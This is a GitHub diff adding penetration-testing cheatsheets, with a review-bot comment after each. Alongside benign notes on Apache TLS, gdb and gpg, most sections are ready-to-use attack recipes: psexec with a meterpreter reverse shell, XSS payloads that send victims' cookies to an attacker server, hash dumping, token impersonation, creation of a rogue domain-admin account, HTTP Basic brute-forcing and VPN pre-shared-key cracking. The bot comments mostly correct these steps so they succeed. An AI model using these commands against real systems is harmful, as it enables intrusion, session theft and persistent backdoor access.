forked from dipsec/Cheatsheets-1
Added more cheatsheets
Showing 19 changed files with 953 additions and 15 deletions.
@@ -0,0 +1,14 @@ | ||
1. Generate executable using Veil. | ||
|
||
2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) | ||
|
||
msf > use exploit/windows/smb/psexec | ||
msf exploit(psexec) > set RHOST 192.168.0.2 | ||
RHOST => 192.168.0.2 | ||
msf exploit(psexec) > set SMBUser user | ||
SMBUser => user | ||
msf exploit(psexec) > set SMBPass pass | ||
SMBPass => pass | ||
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe | ||
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe | ||
msf exploit(psexec) > exploit |
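Review bot: step 2 names the payload (windows/meterpreter/reverse_tcp) but the transcript never sets it, so as written psexec runs with whatever PAYLOAD and LHOST are the module defaults; add `set PAYLOAD windows/meterpreter/reverse_tcp` and an LHOST line before `exploit`. Step 1 ("Generate executable using Veil") has no command at all, and the RHOST, SMBUser/SMBPass and `/root/Desktop/Misc/Veil-master/payload.exe` values are lab-specific, so mark them as placeholders rather than leaving `user`/`pass` literals that look like real settings.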
@@ -0,0 +1,42 @@ | ||
# Enabling Self signed certificates on local website | ||
|
||
1. Install OpenSSL | ||
|
||
2. Run the following command to generate the self signed SSL certificates: | ||
|
||
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt | ||
|
||
3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days. | ||
|
||
4. Install the self signed certificate: | ||
|
||
Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor. | ||
|
||
Add the lines in bold below. <VirtualHost 192.168.0.1:443> | ||
DocumentRoot /var/www/website | ||
ServerName www.domain.com | ||
SSLEngine on | ||
SSLCertificateFile /etc/ssl/certs/primary.crt | ||
SSLCertificateKeyFile /etc/ssl/certs/private.key | ||
SSLCertificateChainFile /etc/ssl/certs/intermediate.crt | ||
</VirtualHost> | ||
|
||
Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor. | ||
|
||
5. Enable mod_ssl under apache using the following commands: | ||
|
||
a2enmod ssl | ||
/etc/init.d/apache2 restart | ||
|
||
## Add ServerName localhost | ||
|
||
to /etc/apache2/apache2.conf | ||
|
||
|
||
More information: | ||
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html | ||
http://www.akadia.com/services/ssh_test_certificate.html | ||
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html | ||
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server | ||
|
||
|
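Review bot: the vhost block in step 4 does not match the certificate produced in step 2. A self-signed certificate has no intermediate, so the `SSLCertificateChainFile /etc/ssl/certs/intermediate.crt` line should be dropped (Apache refuses to start when that file does not exist), and the file names should be mysitename.crt / mysitename.key rather than primary.crt / private.key, or the "change the names of the files" sentence should precede the block. `-nodes` writes the private key unencrypted, so the sheet should tell the reader to keep it outside /etc/ssl/certs (the public-certificate directory), root-owned and mode 600. "Add the lines in bold below" lost its formatting in plain text, `000-default` is `000-default.conf` on current Debian/Ubuntu, and `/etc/init.d/apache2 restart` is better given as `systemctl restart apache2`.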
@@ -0,0 +1,12 @@ | ||
[+] Cookie Stealing: | ||
|
||
[-] Start Web Service | ||
|
||
python -m SimpleHTTPServer 80 | ||
|
||
[-] Use one of the following XSS payloads: | ||
|
||
<script>document.location="http://192.168.0.60/?c="+document.cookie;</script> | ||
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script> | ||
|
||
|
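Review bot: both payloads rely on `document.cookie`, which omits any cookie flagged HttpOnly, so the sheet should state that the test only demonstrates exposure of cookies lacking that flag; that flag is the control a defender should verify. `python -m SimpleHTTPServer 80` is Python 2 only; the Python 3 equivalent is `python3 -m http.server 80`. The second payload requests `/index.php`, which a plain Python file server does not execute, so in both cases the cookie value only ever appears in the server's access log; say so, since that log line is what the reader collects and exactly what shows up in a victim site's own web logs.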
@@ -0,0 +1,30 @@ | ||
[+] After compromising a Windows machine: | ||
|
||
[>] List the domain administrators: | ||
From Shell - net group "Domain Admins" /domain | ||
|
||
[>] Dump the hashes (Metasploit) | ||
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE | ||
|
||
[>] Find the admins (Metasploit) | ||
spool /tmp/enumdomainusers.txt | ||
msf > use auxiliary/scanner/smb/smb_enumusers_domain | ||
msf > set smbuser Administrator | ||
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | ||
msf > set rhosts 10.10.10.0/24 | ||
msf > set threads 8 | ||
msf > run | ||
|
||
msf> spool off | ||
|
||
[>] Compromise Admin's box | ||
meterpreter > load incognito | ||
meterpreter > list_tokens -u | ||
meterpreter > impersonate_token MYDOM\\adaministrator | ||
meterpreter > getuid | ||
meterpreter > shell | ||
|
||
C:\> whoami | ||
mydom\adaministrator | ||
C:\> net user hacker /add /domain | ||
C:\> net group "Domain Admins" hacker /add /domain |
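Review bot: `impersonate_token MYDOM\\adaministrator` and the `whoami` output both misspell Administrator, so the command as written would not match a real token; fix both occurrences. The `smbpass` value `aad3b435b51404ee...:31d6cfe0d16ae931b73c59d7e0c089c0` is the LM:NT hash of an empty password, which only authenticates if the Administrator account has a blank password; label it as a placeholder for the hash obtained from `smart_hashdump`. `spool /tmp/enumdomainusers.txt` is missing the `msf >` prompt the surrounding lines use. The final `net user` / `net group` lines create a persistent domain admin account; the sheet should pair them with the corresponding cleanup (`net user hacker /delete /domain`) so an assessment does not leave a live backdoor account behind.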
@@ -0,0 +1,58 @@ | ||
set disassembly-flavor intel | ||
|
||
$ cat ~/.bash_aliases | grep gdb | ||
alias gdb='gdb -quiet' | ||
|
||
Running gdb | ||
------------------ | ||
$ gdb - run, then use file command to load object | ||
$ gdb -quiet - supress copyright information | ||
$ gdb object - normal debug | ||
$ gdb object core - analyze core dump | ||
$ gdb object pid - attach to running process | ||
|
||
General commands | ||
------------------ | ||
set args - set program arguments | ||
show args - show program arguments | ||
run - run the program | ||
run < file - run with input from file | ||
set follow-exec-mode new/sam - set debugger response to an exec call | ||
set write - set write into executables | ||
set write off - unset write int oexecutables | ||
continue - continue running until break | ||
finish - execute until current stack frame ends | ||
source FILE - read commands from script file | ||
shell [cmd] - run cmd in a shell | ||
display /5i $eip - display expression everytime execution stops | ||
undisplay <expr #> - undisplay expression number | ||
info functions - list all the functions | ||
info variables - list all the variables | ||
info registers - list most common registers | ||
info all-registers - list all registers | ||
info display - print the list of displayed expressions | ||
backtrace - print backtrace of all stack frames | ||
where - same as backtrace | ||
set disassembly-flavor intel - set disassembly style to intel/att | ||
define hook-[cmd] - actions to execute before command | ||
define hooopost-[cmd] - actions to execute after command | ||
define hook-stop - actions to execute when execution stops | ||
|
||
Breakpoints | ||
------------------ | ||
info breakpoints - list all breakpoints | ||
break [func] - break function name | ||
break *[addr] - break at address | ||
delete [bnum] - delete breakpoint bnum | ||
break if [cond] - break if condition | ||
ignore [bnum] [count] - ignore breakpoint bnum count times | ||
condition [bnum] $eax == 0x22 - add condition for breakpoint 1 | ||
condition [bnum] - delete condition for breakpoint 1 | ||
|
||
Watchpoints | ||
------------------ | ||
info watchpoints - list all the watchpoint | ||
watch variable==value - break when variable equals .. | ||
watch $eax == 0x0000ffaa - break when register equals .. | ||
rwatch *[addr] - break on read memory location | ||
awatch *[addr] - break on read/write memory location |
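Review bot: several entries contain typos that change their meaning: `set follow-exec-mode new/sam` should be `new/same`, `define hooopost-[cmd]` should be `hookpost-[cmd]`, `unset write int oexecutables` should read `into executables`, and `supress` is `suppress`. The two `condition [bnum]` lines describe "breakpoint 1" while the placeholder is `[bnum]`; make them agree. The lone `set disassembly-flavor intel` at the top duplicates the entry under General commands; if it is meant as a ~/.gdbinit line, label it as such next to the ~/.bash_aliases snippet, otherwise drop it.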
@@ -0,0 +1,14 @@ | ||
Encrypt | ||
------------ | ||
sudo gpg -e ~/Desktop/file.doc | ||
|
||
This will prompt you to type in the persons name (public key) to encrypt with. | ||
|
||
Decrypt | ||
----------- | ||
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc | ||
|
||
|
||
Import other users' public keys by using: | ||
|
||
sudo gpg --import <key> |
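Review bot: `sudo` is unnecessary for gpg and counterproductive here: it runs gpg as root, so imported keys land in root's keyring rather than the user's and the decrypted file is root-owned. Drop `sudo` from all three commands. Also, `gpg -e` writes file.doc.gpg by default, not file.doc.pgp, so the decrypt line references a file the encrypt line never creates; either correct the name or add `-o` to the encrypt command. Mentioning `-r <recipient>` would let the reader skip the interactive name prompt the prose describes.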
@@ -0,0 +1,40 @@ | ||
[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite | ||
|
||
http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ | ||
|
||
Burp Suite against HTTP Basic authentication | ||
|
||
To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. | ||
|
||
Mark only the Base64 encoded string and click Add button to put the markers around it. | ||
|
||
Dictionary attack | ||
|
||
For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. | ||
Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. | ||
Go to Payload tab and select Custom iterator option from Payload type dropdown box. | ||
Burp Suite Custom Iterator | ||
Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. | ||
Position 1 list and separator option | ||
Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. | ||
Position 2 | ||
After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. | ||
PayloadProcessin_AddRule_Encode | ||
PayloadProcessingEncode | ||
By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. | ||
That’s it. You can start the Intruder attack. | ||
|
||
Bruteforce attack | ||
|
||
The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. | ||
Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. | ||
Burp Intruder Brute forcer | ||
In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. | ||
Burp Intruder Add Prefix | ||
Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. | ||
Burp Sutei Bruteforce Attack Settings | ||
Done! You can start the Intruder attack! | ||
|
||
[>] Automated Security Analyser for ASP.NET Websites | ||
|
||
https://asafaweb.com |
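Review bot: the separator is wrong. HTTP Basic credentials are encoded as `username:password`, so the separator for position 1 and the Add prefix rule must use a colon, not a "semicolumn" (semicolon); with a semicolon every generated payload is rejected regardless of the wordlist. Other text fixes: "e suffix" should be "a suffix", "Burp Sutei" is "Burp Suite", and the bare lines such as "Burp Suite Custom Iterator" and "PayloadProcessin_AddRule_Encode" are screenshot captions copied from the dailysecurity.net article without the images; link the screenshots or remove the captions. Since the section is lifted verbatim from that article, attribute the first-person "I'm using" text to it explicitly rather than only citing the URL.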
@@ -0,0 +1,60 @@ | ||
Aggressive Mode VPN -- IKE-Scan, PSK-Crack | ||
|
||
In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. | ||
|
||
This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. | ||
|
||
It looks like this: | ||
|
||
$ ike-scan 192.168.207.134 | ||
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) | ||
|
||
192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) | ||
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). | ||
0 returned handshake; 1 returned notify | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
$ sudo ike-scan -A 192.168.207.134 | ||
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) | ||
|
||
192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
To save with some output: | ||
|
||
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key | ||
|
||
Once you have you psk file to crack you're stuck with two options psk-crack and cain | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
Brute force: | ||
|
||
$psk-crack -b 5 192-168-207-134key | ||
Running in brute-force cracking mode | ||
Brute force with 36 chars up to length 5 will take up to 60466176 iterations | ||
|
||
no match found for MD5 hash 5c178d[SNIP] | ||
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) | ||
|
||
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= | ||
|
||
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key | ||
Running in brute-force cracking modde | ||
Brute force with 63 chars up to length 5 will take up to 992436543 iterations | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
Dictionary attack: | ||
|
||
$psk-crack -d /path/to/dictionary 192-168-207-134key | ||
Running in dictionary cracking mode | ||
|
||
no match found for MD5 hash 5c178d[SNIP] | ||
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html |
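Review bot: the custom charset `01233456789ABC...z` contains a duplicated `3`, which is why psk-crack reports 63 characters rather than the intended 62; remove it. Typos: "Default is charset is", "cracking modde", "Once you have you psk file". The redaction is inconsistent: the first ike-scan run prints the full responder cookie `f320d682d5c73797` while the -A run masks it as `f320d6XXXXXXXX`; mask both or neither. Since the text concludes that aggressive mode with PSK is insecure, a one-line mitigation (disable aggressive mode, or use main mode with certificate authentication) would complete the sheet for readers assessing their own VPN endpoints.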